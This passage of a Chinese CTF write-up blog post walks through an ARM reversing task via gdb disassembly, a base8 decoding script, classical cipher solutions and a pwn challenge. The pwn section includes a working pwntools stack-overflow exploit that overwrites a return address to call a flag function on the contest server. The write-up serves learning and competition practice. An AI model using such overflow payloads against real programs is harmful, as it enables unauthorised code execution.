class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div></pre></td><td class="code"><pre><div class="line">(gdb) disass main</div><div class="line">Dump of assembler code for function main:</div><div class="line">   0x00008d3c &lt;+0&gt;:	push	&#123;r4, r11, lr&#125;</div><div class="line">   0x00008d40 &lt;+4&gt;:	add	r11, sp, #8</div><div class="line">   0x00008d44 &lt;+8&gt;:	sub	sp, sp, #12</div><div class="line">   0x00008d48 &lt;+12&gt;:	mov	r3, #0</div><div class="line">   0x00008d4c &lt;+16&gt;:	str	r3, [r11, #-16]</div><div class="line">   0x00008d50 &lt;+20&gt;:	ldr	r0, [pc, #104]	; 0x8dc0 &lt;main+132&gt;</div><div class="line">   0x00008d54 &lt;+24&gt;:	bl	0xfb6c &lt;printf&gt;</div><div class="line">   0x00008d58 &lt;+28&gt;:	sub	r3, r11, #16</div><div class="line">   0x00008d5c &lt;+32&gt;:	ldr	r0, [pc, #96]	; 0x8dc4 &lt;main+136&gt;</div><div class="line">   0x00008d60 &lt;+36&gt;:	mov	r1, r3</div><div class="line">   0x00008d64 &lt;+40&gt;:	bl	0xfbd8 &lt;__isoc99_scanf&gt;</div><div class="line">   0x00008d68 &lt;+44&gt;:	bl	0x8cd4 &lt;key1&gt;</div><div class="line">   0x00008d6c &lt;+48&gt;:	mov	r4, r0</div><div class="line">   0x00008d70 &lt;+52&gt;:	bl	0x8cf0 &lt;key2&gt;</div><div class="line">   0x00008d74 &lt;+56&gt;:	mov	r3, r0</div><div class="line">   0x00008d78 &lt;+60&gt;:	add	r4, r4, r3</div><div class="line">   0x00008d7c &lt;+64&gt;:	bl	0x8d20 &lt;key3&gt;</div><div class="line">   0x00008d80 &lt;+68&gt;:	mov	r3, r0</div><div class="line">   0x00008d84 &lt;+72&gt;:	add	r2, r4, r3</div><div class="line">   0x00008d88 &lt;+76&gt;:	ldr	r3, [r11, #-16]</div><div class="line">   0x00008d8c &lt;+80&gt;:	cmp	r2, r3</div><div class="line">   0x00008d90 &lt;+84&gt;:	bne	0x8da8 &lt;main+108&gt;</div><div class="line">   0x00008d94 &lt;+88&gt;:	ldr	r0, [pc, #44]	; 0x8dc8 &lt;main+140&gt;</div><div class="line">   0x00008d98 &lt;+92&gt;:	bl	0x1050c &lt;puts&gt;</div><div class="line">   0x00008d9c &lt;+96&gt;:	ldr	r0, [pc, #40]	; 0x8dcc &lt;main+144&gt;</div><div class="line">   0x00008da0 &lt;+100&gt;:	bl	0xf89c &lt;system&gt;</div><div class="line">   0x00008da4 &lt;+104&gt;:	b	0x8db0 &lt;main+116&gt;</div><div class="line">   0x00008da8 &lt;+108&gt;:	ldr	r0, [pc, #32]	; 0x8dd0 &lt;main+148&gt;</div><div class="line">   0x00008dac &lt;+112&gt;:	bl	0x1050c &lt;puts&gt;</div><div class="line">   0x00008db0 &lt;+116&gt;:	mov	r3, #0</div><div class="line">   0x00008db4 &lt;+120&gt;:	mov	r0, r3</div><div class="line">   0x00008db8 &lt;+124&gt;:	sub	sp, r11, #8</div><div class="line">   0x00008dbc &lt;+128&gt;:	pop	&#123;r4, r11, pc&#125;</div><div class="line">   0x00008dc0 &lt;+132&gt;:	andeq	r10, r6, r12, lsl #9</div><div class="line">   0x00008dc4 &lt;+136&gt;:	andeq	r10, r6, r12, lsr #9</div><div class="line">   0x00008dc8 &lt;+140&gt;:			; &lt;UNDEFINED&gt; instruction: 0x0006a4b0</div><div class="line">   0x00008dcc &lt;+144&gt;:			; &lt;UNDEFINED&gt; instruction: 0x0006a4bc</div><div class="line">   0x00008dd0 &lt;+148&gt;:	andeq	r10, r6, r4, asr #9</div><div class="line">End of assembler dump.</div><div class="line">(gdb) disass key1</div><div class="line">Dump of assembler code for function key1:</div><div class="line">   0x00008cd4 &lt;+0&gt;:	push	&#123;r11&#125;		; (str r11, [sp, #-4]!)</div><div class="line">   0x00008cd8 &lt;+4&gt;:	add	r11, sp, #0</div><div class="line">   0x00008cdc &lt;+8&gt;:	mov	r3, pc</div><div class="line">   0x00008ce0 &lt;+12&gt;:	mov	r0, r3</div><div class="line">   0x00008ce4 &lt;+16&gt;:	sub	sp, r11, #0</div><div class="line">   0x00008ce8 &lt;+20&gt;:	pop	&#123;r11&#125;		; (ldr r11, [sp], #4)</div><div class="line">   0x00008cec &lt;+24&gt;:	bx	lr</div><div class="line">End of assembler dump.</div><div class="line">(gdb) disass key2</div><div class="line">Dump of assembler code for function key2:</div><div class="line">   0x00008cf0 &lt;+0&gt;:	push	&#123;r11&#125;		; (str r11, [sp, #-4]!)</div><div class="line">   0x00008cf4 &lt;+4&gt;:	add	r11, sp, #0</div><div class="line">   0x00008cf8 &lt;+8&gt;:	push	&#123;r6&#125;		; (str r6, [sp, #-4]!)</div><div class="line">   0x00008cfc &lt;+12&gt;:	add	r6, pc, #1</div><div class="line">   0x00008d00 &lt;+16&gt;:	bx	r6</div><div class="line">   0x00008d04 &lt;+20&gt;:	mov	r3, pc</div><div class="line">   0x00008d06 &lt;+22&gt;:	adds	r3, #4</div><div class="line">   0x00008d08 &lt;+24&gt;:	push	&#123;r3&#125;</div><div class="line">   0x00008d0a &lt;+26&gt;:	pop	&#123;pc&#125;</div><div class="line">   0x00008d0c &lt;+28&gt;:	pop	&#123;r6&#125;		; (ldr r6, [sp], #4)</div><div class="line">   0x00008d10 &lt;+32&gt;:	mov	r0, r3</div><div class="line">   0x00008d14 &lt;+36&gt;:	sub	sp, r11, #0</div><div class="line">   0x00008d18 &lt;+40&gt;:	pop	&#123;r11&#125;		; (ldr r11, [sp], #4)</div><div class="line">   0x00008d1c &lt;+44&gt;:	bx	lr</div><div class="line">End of assembler dump.</div><div class="line">(gdb) disass key3</div><div class="line">Dump of assembler code for function key3:</div><div class="line">   0x00008d20 &lt;+0&gt;:	push	&#123;r11&#125;		; (str r11, [sp, #-4]!)</div><div class="line">   0x00008d24 &lt;+4&gt;:	add	r11, sp, #0</div><div class="line">   0x00008d28 &lt;+8&gt;:	mov	r3, lr</div><div class="line">   0x00008d2c &lt;+12&gt;:	mov	r0, r3</div><div class="line">   0x00008d30 &lt;+16&gt;:	sub	sp, r11, #0</div><div class="line">   0x00008d34 &lt;+20&gt;:	pop	&#123;r11&#125;		; (ldr r11, [sp], #4)</div><div class="line">   0x00008d38 &lt;+24&gt;:	bx	lr</div><div class="line">End of assembler dump.</div><div class="line">(gdb)</div></pre></td></tr></table></figure>
<p>调用了key1 key2 key3然后将三个返回值相加与输入对比。<em>三个key两个纠结于pc，一般来讲pc应该指向下一个指令，但由于流水线(pipeline)导致其应该指向正在取址的指令也就是下下条指令而不是正在译码的下一条指令。</em> 其中key1返回值为mov语句执行时的pc，也就是下下条指令地址0x00008ce4;key2切换为thumb指令集再执行也先取了pc值也就是0x00008d08，再加上4得到0x00008d0c;key3返回lr也就是key3函数返回地址0x00008d80，相加得到flag</p>
<h2 id="学习资料的密码"><a href="#学习资料的密码" class="headerlink" title="学习资料的密码"></a>学习资料的密码</h2><p>将encrypt.exe用ida打开，F5</p>
<p><img src="http://pic.leommxj.com/201802022131_817.png" alt=""></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div></pre></td><td class="code"><pre><div class="line">_BYTE *__<span class="function">cdecl <span class="title">basen</span><span class="params">(<span class="keyword">char</span> *a1)</span></span></div><div class="line">&#123;</div><div class="line">  <span class="keyword">int</span> v1; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v2; <span class="comment">// ST2C_4</span></div><div class="line">  <span class="keyword">int</span> v3; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v4; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v5; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v6; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v7; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v8; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v9; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v10; <span class="comment">// ST2C_4</span></div><div class="line">  <span class="keyword">int</span> v11; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v12; <span class="comment">// ecx</span></div><div class="line">  <span class="keyword">int</span> v13; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v14; <span class="comment">// ST2C_4</span></div><div class="line">  <span class="keyword">int</span> v15; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v16; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">int</span> v17; <span class="comment">// eax</span></div><div class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> v19; <span class="comment">// [esp+20h] [ebp-18h]</span></div><div class="line">  _BYTE *v20; <span class="comment">// [esp+24h] [ebp-14h]</span></div><div class="line">  <span class="keyword">int</span> i; <span class="comment">// [esp+28h] [ebp-10h]</span></div><div class="line">  <span class="keyword">int</span> v22; <span class="comment">// [esp+2Ch] [ebp-Ch]</span></div><div class="line">  <span class="keyword">int</span> v23; <span class="comment">// [esp+2Ch] [ebp-Ch]</span></div><div class="line"></div><div class="line">  v19 = <span class="built_in">strlen</span>(a1);</div><div class="line">  v20 = <span class="built_in">calloc</span>(<span class="number">1u</span>, <span class="number">8</span> * (v19 / <span class="number">3</span> + <span class="number">1</span>));</div><div class="line">  v22 = <span class="number">0</span>;</div><div class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; v19 - v19 % <span class="number">3</span>; i += <span class="number">3</span> )</div><div class="line">  &#123;</div><div class="line">    v1 = v22;</div><div class="line">    v2 = v22 + <span class="number">1</span>;</div><div class="line">    v20[v1] = chart[(a1[i] &gt;&gt; <span class="number">5</span>) &amp; <span class="number">7</span>];</div><div class="line">    v3 = v2++;</div><div class="line">    v20[v3] = chart[(a1[i] &gt;&gt; <span class="number">2</span>) &amp; <span class="number">7</span>];</div><div class="line">    v4 = v2++;</div><div class="line">    v20[v4] = chart[<span class="number">2</span> * a1[i] &amp; <span class="number">6</span> | (a1[i + <span class="number">1</span>] &gt;&gt; <span class="number">7</span>) &amp; <span class="number">1</span>];</div><div class="line">    v5 = v2++;</div><div class="line">    v20[v5] = chart[(a1[i + <span class="number">1</span>] &gt;&gt; <span class="number">4</span>) &amp; <span class="number">7</span>];</div><div class="line">    v6 = v2++;</div><div class="line">    v20[v6] = chart[(a1[i + <span class="number">1</span>] &gt;&gt; <span class="number">1</span>) &amp; <span class="number">7</span>];</div><div class="line">    v7 = v2++;</div><div class="line">    v20[v7] = chart[<span class="number">4</span> * a1[i + <span class="number">1</span>] &amp; <span class="number">4</span> | (a1[i + <span class="number">2</span>] &gt;&gt; <span class="number">6</span>) &amp; <span class="number">3</span>];</div><div class="line">    v20[v2] = chart[(a1[i + <span class="number">2</span>] &gt;&gt; <span class="number">3</span>) &amp; <span class="number">7</span>];</div><div class="line">    v8 = v2 + <span class="number">1</span>;</div><div class="line">    v22 = v2 + <span class="number">2</span>;</div><div class="line">    v20[v8] = chart[a1[i + <span class="number">2</span>] &amp; <span class="number">7</span>];</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">if</span> ( v19 % <span class="number">3</span> )</div><div class="line">  &#123;</div><div class="line">    <span class="keyword">if</span> ( v19 % <span class="number">3</span> == <span class="number">1</span> )</div><div class="line">    &#123;</div><div class="line">      v9 = v22;</div><div class="line">      v10 = v22 + <span class="number">1</span>;</div><div class="line">      v20[v9] = chart[(a1[v19 - <span class="number">1</span>] &gt;&gt; <span class="number">5</span>) &amp; <span class="number">7</span>];</div><div class="line">      v20[v10] = chart[(a1[v19 - <span class="number">1</span>] &gt;&gt; <span class="number">2</span>) &amp; <span class="number">7</span>];</div><div class="line">      v11 = v10 + <span class="number">1</span>;</div><div class="line">      v23 = v10 + <span class="number">2</span>;</div><div class="line">      v12 = <span class="number">2</span> * a1[v19 - <span class="number">1</span>] &amp; <span class="number">6</span>;</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">else</span></div><div class="line">    &#123;</div><div class="line">      v13 = v22;</div><div class="line">      v14 = v22 + <span class="number">1</span>;</div><div class="line">      v20[v13] = chart[a1[v19 - <span class="number">2</span>] &gt;&gt; <span class="number">5</span>];</div><div class="line">      v15 = v14++;</div><div class="line">      v20[v15] = chart[(a1[v19 - <span class="number">2</span>] &gt;&gt; <span class="number">2</span>) &amp; <span class="number">7</span>];</div><div class="line">      v16 = v14++;</div><div class="line">      v20[v16] = chart[<span class="number">2</span> * a1[v19 - <span class="number">2</span>] &amp; <span class="number">6</span> | (a1[v19 - <span class="number">1</span>] &gt;&gt; <span class="number">7</span>) &amp; <span class="number">1</span>];</div><div class="line">      v17 = v14++;</div><div class="line">      v20[v17] = chart[(a1[v19 - <span class="number">1</span>] &gt;&gt; <span class="number">4</span>) &amp; <span class="number">7</span>];</div><div class="line">      v20[v14] = chart[(a1[v19 - <span class="number">1</span>] &gt;&gt; <span class="number">1</span>) &amp; <span class="number">7</span>];</div><div class="line">      v11 = v14 + <span class="number">1</span>;</div><div class="line">      v23 = v14 + <span class="number">2</span>;</div><div class="line">      v12 = <span class="number">4</span> * a1[v19 - <span class="number">1</span>] &amp; <span class="number">4</span>;</div><div class="line">    &#125;</div><div class="line">    v20[v11] = chart[v12];</div><div class="line">    v20[v23] = <span class="number">0</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">else</span></div><div class="line">  &#123;</div><div class="line">    v20[v22] = <span class="number">0</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">return</span> v20;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>可以看出basen函数每三位一组，也就是base8，再看chart<img src="http://pic.leommxj.com/201802022133_423.png" alt=""></p>
<p>写脚本还原为二进制</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> collections <span class="keyword">import</span> Counter</div><div class="line"></div><div class="line">f = open(<span class="string">"encrypt"</span>,<span class="string">"r"</span>)</div><div class="line">a = f.read()</div><div class="line">basechart = <span class="string">"W3lc0me!"</span></div><div class="line">cnt = Counter()</div><div class="line">r = []</div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</div><div class="line">	cnt[i] += <span class="number">1</span></div><div class="line">	r.append(basechart.index(i))</div><div class="line"></div><div class="line">b = [<span class="string">"&#123;:0&gt;3s&#125;"</span>.format(bin(i)[<span class="number">2</span>:]) <span class="keyword">for</span> i <span class="keyword">in</span> r]</div><div class="line">b = <span class="string">""</span>.join(b)</div><div class="line">print(b)</div></pre></td></tr></table></figure>
<p>即为flag</p>
<p><img src="http://pic.leommxj.com/201802022140_525.png" alt=""></p>
<h1 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h1><h2 id="单表代替"><a href="#单表代替" class="headerlink" title="单表代替"></a>单表代替</h2><p><img src="http://pic.leommxj.com/201802022140_210.png" alt=""></p>
<p>一堆俄文字母，其中可以发现标点符号和数字应该是没有替换的。由提示得到原文应为英文。根据常见英文词以及字频可以发现长得像epy的是the，同样可以看到年份前的in，一步步替换，最终得到差不多的全文，是《飘》的英文简介，维基百科查到原文，将部分未替换的出现次数较少的字母替换掉，得到flag</p>
<p><img src="http://pic.leommxj.com/201802022143_285.png" alt=""></p>
<h2 id="多表代替"><a href="#多表代替" class="headerlink" title="多表代替"></a>多表代替</h2><p>多表替代，维吉尼亚密码，<a href="https://www.guballa.de/vigenere-solver" target="_blank" rel="external">在线解密</a> ，出乎意料的没出问题，得到flag。</p>
<p><img src="http://pic.leommxj.com/201802022147_673.png" alt=""></p>
<h2 id="EASY-XOR"><a href="#EASY-XOR" class="headerlink" title="EASY_XOR"></a>EASY_XOR</h2><p>题目既给了明文也给了密文，提示其实并不需要，直接尝试cribdrag</p>
<p>密文输入，将明文一段当作crib得到key</p>
<p><img src="http://pic.leommxj.com/201802022150_476.png" alt=""></p>
<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="stackoverflow"><a href="#stackoverflow" class="headerlink" title="stackoverflow"></a>stackoverflow</h2><p><img src="http://pic.leommxj.com/201802022151_461.png" alt=""></p>
<p>vuln中通过输入覆盖返回地址到程序内置flag函数</p>
<p><img src="http://pic.leommxj.com/201802022152_211.png" alt=""></p>
<p>此函数需要check两个参数，同样覆盖对应地址，得到flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</div><div class="line"><span class="comment">#s = process("./stackoverflow")</span></div><div class="line">s = remote(<span class="string">"111.230.132.82"</span>,<span class="string">"40000"</span>)</div><div class="line"></div><div class="line">s.recv()</div><div class="line">getflag = <span class="number">0x80485df</span> </div><div class="line">a1 = <span class="number">0xDEADBEEF</span></div><div class="line">a2 = <span class="number">0xC0FFEE</span></div><div class="line">s.sendline(<span class="string">"a"</span>*<span class="number">44</span>+p32(getflag)+<span class="string">"a"</span>*<span class="number">4</span>+p32(a1)+p32(a2))</div><div class="line"></div><div class="line">s.interactive()</div></pre></td></tr></table></figure>
<p><img src="http://pic.leommxj.com/201802022153_420.png" alt=""></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>本来没注意到这个比赛，这校赛的质量是我们学校可望不可及的啊。不少题都挺有意思的比如杂项中的use_your_ida，我这个菜鸡也终于算是个业余pwn手比赛里做出来道pwn   - -.</p>

      
    </div>

    <div>
      
        
      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag">#CTF</a>
          
            <a href="/tags/Sec/" rel="tag">#Sec</a>
          
            <a href="/tags/Writeup/" rel="tag">#Writeup</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/01/30/CTFd-deployment-using-Nginx-Tornado/" rel="next" title="Nginx+Tornado部署CTFd">
                <i class="fa fa-chevron-left"></i> Nginx+Tornado部署CTFd
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/21/write-a-ida-process-module-for-chip-8/" rel="prev" title="为CHIP-8编写ida process module">
                为CHIP-8编写ida process module <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
            <div id="uyan_frame"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/avatar.jpg"
               alt="leommxj" />
          <p class="site-author-name" itemprop="name">leommxj</p>
          <p class="site-description motion-element" itemprop="description"></p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">9</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">15</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/leommxj" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#MISC"><span class="nav-number">1.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#BaSO4"><span class="nav-number">1.1.</span> <span class="nav-text">BaSO4</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#攻击流量分析"><span class="nav-number">1.2.</span> <span class="nav-text">攻击流量分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#use-your-ida"><span class="nav-number">1.3.</span> <span class="nav-text">use_your_ida</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#键盘流量分析"><span class="nav-number">1.4.</span> <span class="nav-text">键盘流量分析</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#WEB"><span class="nav-number">2.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#PHPreading"><span class="nav-number">2.1.</span> <span class="nav-text">PHPreading</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BabyEval"><span class="nav-number">2.2.</span> <span class="nav-text">BabyEval</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小电影"><span class="nav-number">2.3.</span> <span class="nav-text">小电影</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SecurePY"><span class="nav-number">2.4.</span> <span class="nav-text">SecurePY</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#REVERSE"><span class="nav-number">3.</span> <span class="nav-text">REVERSE</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Baby-Android"><span class="nav-number">3.1.</span> <span class="nav-text">Baby Android</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#网管的麒麟臂"><span class="nav-number">3.2.</span> <span class="nav-text">网管的麒麟臂</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#学习资料的密码"><span class="nav-number">3.3.</span> <span class="nav-text">学习资料的密码</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CRYPTO"><span class="nav-number">4.</span> <span class="nav-text">CRYPTO</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#单表代替"><span class="nav-number">4.1.</span> <span class="nav-text">单表代替</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#多表代替"><span class="nav-number">4.2.</span> <span class="nav-text">多表代替</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EASY-XOR"><span class="nav-number">4.3.</span> <span class="nav-text">EASY_XOR</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PWN"><span class="nav-number">5.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#stackoverflow"><span class="nav-number">5.1.</span> <span class="nav-text">stackoverflow</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#总结"><span class="nav-number">6.</span> <span class="nav-text">总结</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">leommxj</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  


  

    
      
    

   
        <!-- UY BEGIN -->
        <script type="text/javascript" src="http://v2.uyan.cc/code/uyan.js?uid=2136197"></script>
        <!-- UY END -->
    
  
  
  
  
  <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
  </script>

  <script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for (i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  </script>
  <script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>


  

  
<script type="text/javascript" async src="//push.zhanzhang.baidu.com/push.js">
</script>


</body>
</html>
